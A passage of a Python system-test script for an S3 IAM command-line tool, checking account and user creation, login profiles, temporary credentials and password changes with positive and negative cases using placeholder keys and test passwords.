'AccountName': 's3testwithkeys3',
'Email': 's3testwithkeys3@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'secret_key': 'SSSSSSSS2'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
# 4. Negative
test_msg = "Create account s3testwithkeys4 with invalid Access key"
account_args = {
'AccountName': 's3testwithkeys4',
'Email': 's3testwithkeys4@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAA',
'secret_key': 'SSSSSSSSS12'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
# 5. Negative
test_msg = "Create account s3testwithkeys5 with invalid Secret key"
account_args = {
'AccountName': 's3testwithkeys5',
'Email': 's3testwithkeys5@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAAAAAAAAAAAAA3',
'secret_key': 'SSSS'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
test_msg = "Create account s3test"
account_args = {'AccountName': 's3test', 'Email': 's3test@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
GlobalTestState.root_access_key = account_response_elements['AccessKeyId']
GlobalTestState.root_secret_key = account_response_elements['SecretKey']
# Create Account again with same email ID
test_msg = "Create account s3test1 should fail with EmailAlreadyExists"
account_args = {'AccountName': 's3test1', 'Email': 's3test@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "Account wasn't created."
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_should_match_pattern(account_response_pattern)
result.command_response_should_have("EmailAlreadyExists")
test_msg = "List accounts"
account_args = {'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
accounts_response_pattern = "AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
result = AuthTest(test_msg).list_account(**account_args).execute_test()
result.command_should_match_pattern(accounts_response_pattern)
test_msg = "List accounts - Take ldapuser and ldappasswd from config"
# Put SG_LDAP_PASSWD and SG_LDAP_USER in ~/.sgs3iamcli/config.yaml file
new_config_entries = {'SG_LDAP_PASSWD' : S3ClientConfig.ldappasswd, 'SG_LDAP_USER': S3ClientConfig.ldapuser}
update_config_yaml(new_config_entries)
accounts_response_pattern = "AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
result = AuthTest(test_msg).list_account().execute_test()
result.command_should_match_pattern(accounts_response_pattern)
restore_config_yaml()
test_msg = "List accounts - Take ldapuser and ldappasswd from env"
# Declare SG_LDAP_USER and SG_LDAP_PASSWD environment variables
os.environ['SG_LDAP_USER'] = S3ClientConfig.ldapuser
os.environ['SG_LDAP_PASSWD'] = S3ClientConfig.ldappasswd
accounts_response_pattern = "AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
result = AuthTest(test_msg).list_account().execute_test()
result.command_should_match_pattern(accounts_response_pattern)
# Remove environment variables declared above
os.environ.pop("SG_LDAP_USER")
os.environ.pop("SG_LDAP_PASSWD")
test_msg = "List accounts - Take invalid ldapuser and ldappasswd from config"
new_config_entries = {'SG_LDAP_PASSWD': 'sgiamadmin#', 'SG_LDAP_USER': 'ldapadmin#'}
update_config_yaml(new_config_entries)
result = AuthTest(test_msg).list_account().execute_test(negative_case=True)
result.command_should_match_pattern("Failed to list accounts")
restore_config_yaml()
#TODO - Need to fix this test. Currently skipping it because it waits for the password to be entered manually at the prompt.
'''
test_msg = "List accounts - Take ldapuser and ldappasswd from prompt"
_use_root_credentials()
accounts_response_pattern = "Enter Ldap User Id: Enter Ldap password: AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
stdin_values = S3ClientConfig.ldapuser + '\n' + S3ClientConfig.ldappasswd
S3ClientConfig.ldapuser = None
S3ClientConfig.ldappasswd = None
result = AuthTest(test_msg).list_account().execute_test(False, False, stdin_values)
result.command_should_match_pattern(accounts_response_pattern)
'''
load_test_config()
# Test create user API
# Case 1 - Path not given (take default value).
# Case 2 - Path given
def user_tests():
_use_root_credentials()
date_pattern = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1]) (2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9][\+-][0-9]*:[0-9]*"
#Below account creation is for aws iam cli system testing. First delete the account if it already exists and then create it anew
test_msg = "Delete account if already exist"
account_args = {}
test_msg = "Delete account aws_iam_test_account"
account_args = {'AccountName': 'aws_iam_test_account'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)
test_msg = "Create account aws_iam_test_account"
account_args = {'AccountName': 'aws_iam_test_account', 'Email': 'iam@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
# Save the details in a credential file
with open("aws_iam_credential_file", "w") as f:
    f.write("[default]\n")
    f.write("aws_access_key_id = ")
    f.write(account_response_elements['AccessKeyId'])
    f.write("\naws_secret_access_key = ")
    f.write(account_response_elements['SecretKey'])
#GetTempAuth Start
#Create account
test_msg = "Create account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "tempAuthTestAccount"
access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
s3test_access_key = S3ClientConfig.access_key_id
s3test_secret_key = S3ClientConfig.secret_key
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
#Create Account LoginProfile for tempAuthTestAccount
test_msg = 'create account login profile should succeed.'
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="tempAuthTestAccount"
user_args['Password'] = "accountpassword"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
date_pattern_for_tempAuthCred = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1])T(2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9].[0-9]*[\+-][0-9]*"
#Get Temp Auth Credentials for the account
access_key_args['Password'] = "accountpassword"
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
#Export the temporary AWS credentials as environment variables
response_elements = get_response_elements(result.status.stdout)
os.environ["AWS_ACCESS_KEY_ID"] = response_elements['AccessKeyId']
os.environ["AWS_SECRET_ACCESS_KEY"] = response_elements['SecretAccessKey']
os.environ["AWS_SESSION_TOKEN"] = response_elements['SessionToken']
AwsTest('Aws can create bucket').create_bucket("tempcredbucket").execute_test().command_is_successful()
AwsTest('Aws can delete bucket').delete_bucket("tempcredbucket").execute_test().command_is_successful()
del os.environ["AWS_ACCESS_KEY_ID"]
del os.environ["AWS_SECRET_ACCESS_KEY"]
del os.environ["AWS_SESSION_TOKEN"]
#Create User
access_key_args['UserName'] = "u1"
test_msg = "Create User u1"
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**access_key_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
#Create user loginprofile
access_key_args['Password'] = "userpassword"
test_msg = 'create user login profile for u1'
user_name_flag = "-n"
password_flag = "--password"
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**access_key_args).execute_test()
#Get Temp Auth Credentials for user u1
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
#Get Temp Auth Credentials for account with duration more than max allowed
test_msg = 'GetTempAuthCredentials failure'
account_name_flag = "-a"
password_flag = "--password"
access_key_args['Duration'] = "500000"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("MaxDurationIntervalExceeded")
#Get Temp Auth Credentials for account with duration less than minimum required
test_msg = 'GetTempAuthCredentials failure'
account_name_flag = "-a"
password_flag = "--password"
access_key_args['Duration'] = "50"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("MinDurationIntervalNotMaintained")
#Update the PasswordResetRequired flag via UpdateUserLoginProfile and verify
test_msg = 'update user login profile for u1'
access_key_args['PasswordResetRequired']=True
result = AuthTest(test_msg).update_login_profile(user_name_flag ,**access_key_args).execute_test()
result.command_response_should_have("UpdateUserLoginProfile is successful")
#GetTempAuthCredentials should fail when PasswordResetRequired is true
test_msg = 'GetTempAuthCredentials failure'
account_name_flag = "-a"
password_flag = "--password"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("PasswordResetRequired")
# UpdateAccountLoginProfile and DeleteAccount with Temp Credentials -- Start
os.environ["AWS_ACCESS_KEY_ID"] = response_elements['AccessKeyId']
os.environ["AWS_SECRET_ACCESS_KEY"] = response_elements['SecretAccessKey']
os.environ["AWS_SESSION_TOKEN"] = response_elements['SessionToken']
test_msg = 'UpdateAccountLoginProfile Successful'
account_args = {}
account_name_flag = "-n"
password_flag = "--password"
account_args['AccountName'] ="tempAuthTestAccount"
account_args['Password'] ="newpwd1234"
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
#Delete account
test_msg = "Delete account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', 'force': True}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = s3test_access_key
S3ClientConfig.secret_key = s3test_secret_key
del os.environ["AWS_ACCESS_KEY_ID"]
del os.environ["AWS_SECRET_ACCESS_KEY"]
del os.environ["AWS_SESSION_TOKEN"]
# UpdateAccountLoginProfile and DeleteAccount with Temp Credentials -- End
#GetTempAuth End
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Update User s3user1 (new name = s3user1New, new path - /test/success)'
user_args = {}
user_args['UserName'] = "s3user1"
user_args['NewUserName'] = "s3user1New"
user_args['NewPath'] = "/test/success/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
test_msg = 'create user login profile should fail for exceeding max allowed password length.'
user_args = {}
maxPasswordLength = "abcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijk\
abcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrddd";
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "s3user1New"
user_args['Password'] = maxPasswordLength
result = AuthTest(test_msg).create_login_profile(user_name_flag, password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create userloginprofile.")
test_msg = 'create user login profile should fail for invalid username.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "s3userinvalidname"
user_args['Password'] = "abcdef"
result = AuthTest(test_msg).create_login_profile(user_name_flag, password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create userloginprofile.")
test_msg = 'create user login profile should fail for empty username.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="\"\""
user_args['Password'] = "abcdre"
result = AuthTest(test_msg).create_login_profile(user_name_flag, password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create userloginprofile.")
test_msg = 'create user login profile should fail for username missing.'
user_args = {}
user_name_flag = ""
password_flag = "--password"
user_args['UserName'] =""
user_args['Password'] = "abcdref"
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("User name is required for user login-profile creation")
test_msg = 'create user login profile should fail for password missing.'
user_args = {}
user_name_flag = "-n"
password_flag = ""
user_args['UserName'] ="abcd"
user_args['Password'] = ""
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("User password is required for user login-profile creation")
test_msg = 'create user login profile should fail with username as root.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="root"
user_args['Password'] = "pqrsef"
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot create account login profile with CreateUserLoginProfile")
test_msg = 'create user login profile should succeed.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="s3user1New"
user_args['Password'] = "abcdefg"
login_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'create user login profile failed for user with existing login profile'
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("EntityAlreadyExists")
#********* Test create user login profile with --password-reset-required *********************
test_msg = 'Create User user01'
user_args = {'UserName': 'user01'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'create user login profile should succeed with --password-reset-required'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "user01"
user_args['Password'] = "abcdef"
user_args['PasswordResetRequired'] = "True"
login_profile_response_pattern = "Login Profile "+date_pattern+" "+user_args['PasswordResetRequired']+" "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'Delete User user01'
user_args = {}
user_args['UserName'] = "user01"
user_args['Password'] = "abcdef"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
#********* Test create user login profile with --no-password-reset-required *********************
test_msg = 'Create User user02'
user_args = {'UserName': 'user02'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'create user login profile should succeed with --no-password-reset-required'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "user02"
user_args['Password'] = "abcddt"
user_args['PasswordResetRequired'] = "False"
login_profile_response_pattern = "Login Profile "+date_pattern+" "+user_args['PasswordResetRequired']+" "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'Delete User user02'
user_args = {}
user_args['UserName'] = "user02"
user_args['Password'] = "abcddt"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'GetUserLoginProfile Successful'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
user_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test()
result.command_should_match_pattern(user_profile_response_pattern)
test_msg = 'GetUserLoginProfile failed for invalid user'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="abcd"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to get Login Profile")
test_msg = 'GetUserLoginProfile should fail with username as root'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="root"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot get account login profile with GetUserLoginProfile")
test_msg = "Create User loginProfileTestUser (default path)"
user_args = {'UserName': 'loginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'GetUserLoginProfile failed for user without LoginProfile created'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="loginProfileTestUser"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("NoSuchEntity")
test_msg = 'Delete User loginProfileTestUser'
user_args = {}
user_args['UserName'] = "loginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create User updateLoginProfileTestUser (default path)"
user_args = {'UserName': 'updateLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is updateLoginProfileTestUser)'
access_key_args = {}
access_key_args['UserName'] = 'updateLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'UpdateLoginProfile should fail when tried with IAM User accessKey-secretKey'
user_name_flag = "-n"
access_key_args['UserName'] ="updateLoginProfileTestUser"
access_key_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile_with_user_key(user_name_flag , **access_key_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidUser")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User UpdateLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "updateLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'UpdateLoginProfile is successful'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
user_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test()
result.command_response_should_have("UpdateUserLoginProfile is successful")
test_msg = 'UpdateLoginProfile fails without new password, password-reset or no-password-reset flag entered'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Please provide password or password-reset flag")
test_msg = 'UpdateLoginProfile should fail with username as root'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="root"
user_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot update account login profile with UpdateUserLoginProfile")
test_msg = 'UpdateLoginProfile is successful with only password-reset flag entered'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
user_args['PasswordResetRequired']=True
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test()
result.command_response_should_have("UpdateUserLoginProfile is successful")
test_msg = 'GetLoginProfile to validate password reset flag set to True'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test()
result.command_response_should_have("True")
test_msg = "Create User updateLoginProfileTestUser (default path)"
user_args = {'UserName': 'updateLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'UpdateUserLoginProfile failed for user without LoginProfile created'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="updateLoginProfileTestUser"
user_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("NoSuchEntity")
test_msg = 'Delete User updateLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "updateLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'UpdateUserLoginProfile failed for username missing.'
user_args = {}
user_name_flag = ""
user_args['UserName'] =""
user_args['Password'] = "abcdefd"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("UserName is required for UpdateUserLoginProfile")
test_msg = 'UpdateLoginProfile failed as user does not exist in LDAP'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="dummyUser"
user_args['Password'] = "password"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("UpdateUserLoginProfile failed")
test_msg = 'UpdateLoginProfile failed for invalid username'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="dummyUser$"
user_args['Password'] = "password"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
#*************************Test s3iamcli ChangePassword for IAM user******************
test_msg = "Create User changePasswordUserLoginProfileTestUser "
user_args = {'UserName': 'changePasswordUserLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is changePasswordUserLoginProfileTestUser)'
access_key_args = {}
user_access_key_args = {}
access_key_args['UserName'] = 'changePasswordUserLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
user_access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
user_access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'create user login profile for changePasswordUserLoginProfileTestUser.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="changePasswordUserLoginProfileTestUser"
user_args['Password'] = "abcdfs"
login_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'ChangePassword should fail with root accessKey-secretKey, user OldPassword and NewPassword.'
account_user_access_key_args = {}
account_user_access_key_args['AccessKeyId'] = S3ClientConfig.access_key_id
account_user_access_key_args['SecretAccessKey'] = S3ClientConfig.secret_key
account_user_access_key_args['OldPassword'] ="abcdfs"
account_user_access_key_args['NewPassword'] = "pqrswq"
result = AuthTest(test_msg).change_user_password(**account_user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidUserType")
test_msg = 'ChangePassword should fail with IAM user accessKey-secretKey, NewPassword and invalid oldPassword.'
test_access_key_args = {}
test_access_key_args['AccessKeyId'] = user_access_key_args['AccessKeyId']
test_access_key_args['SecretAccessKey'] = user_access_key_args['SecretAccessKey']
test_access_key_args['NewPassword'] = "pqrswq"
test_access_key_args['OldPassword'] = "pqrsqq"
result = AuthTest(test_msg).change_user_password(**test_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidPassword")
test_msg = 'ChangePassword with IAM User accessKey-secretKey, OldPassword and NewPassword should succeed.'
user_access_key_args['OldPassword'] ="abcdfs"
user_access_key_args['NewPassword'] = "pqrsoe"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'Two subsequent ChangePassword with valid password value should succeed - first changepassword'
user_access_key_args['OldPassword'] ="pqrsoe"
user_access_key_args['NewPassword'] = "vcxvsd"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'Two subsequent ChangePassword with valid password value should succeed - second changepassword'
user_access_key_args['OldPassword'] ="vcxvsd"
user_access_key_args['NewPassword'] = "xyzdet"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'ChangePassword with same value for oldPassword and newPassword should fail.'
user_access_key_args['OldPassword'] ="xyzdet"
user_access_key_args['NewPassword'] = "xyzdet"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidPassword")
test_msg = 'ChangePassword with empty value i.e. "" for newPassword should fail.'
user_access_key_args['OldPassword'] ="xyzdet"
user_access_key_args['NewPassword'] = "\"\""
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("Invalid length for parameter NewPassword")
test_msg = 'ChangePassword with special character i.e. pqrsdd\\t as newPassword should succeed.'
user_access_key_args['OldPassword'] ="xyzdet"
user_access_key_args['NewPassword'] = "pqrsdd\\t"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'ChangePassword with space i.e." avcghj " as newPassword should succeed.'
user_access_key_args['OldPassword'] ="pqrsdd\\t"
user_access_key_args['NewPassword'] = " avcghj "
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'ChangePassword with special character e.g. xvc#?*% as newPassword should succeed.'
user_access_key_args['OldPassword'] =" avcghj "
user_access_key_args['NewPassword'] = "xvc#?*%"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = "Create User TestUser "
user_args = {'UserName': 'TestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is TestUser)'
access_key_args = {}
test_user_access_key_args = {}
access_key_args['UserName'] = 'TestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
test_user_access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_user_access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'ChangePassword should fail with another IAM user (i.e. TestUser) accessKey-secretKey, OldPassword and NewPassword.'
test_user_access_key_args['OldPassword'] ="pqrsdd"
test_user_access_key_args['NewPassword'] = "xyzadd"
result = AuthTest(test_msg).change_user_password(**test_user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidUserType")
test_msg = 'Delete access key for changePasswordUserLoginProfileTestUser'
result = AuthTest(test_msg).delete_access_key(**user_access_key_args).execute_test()
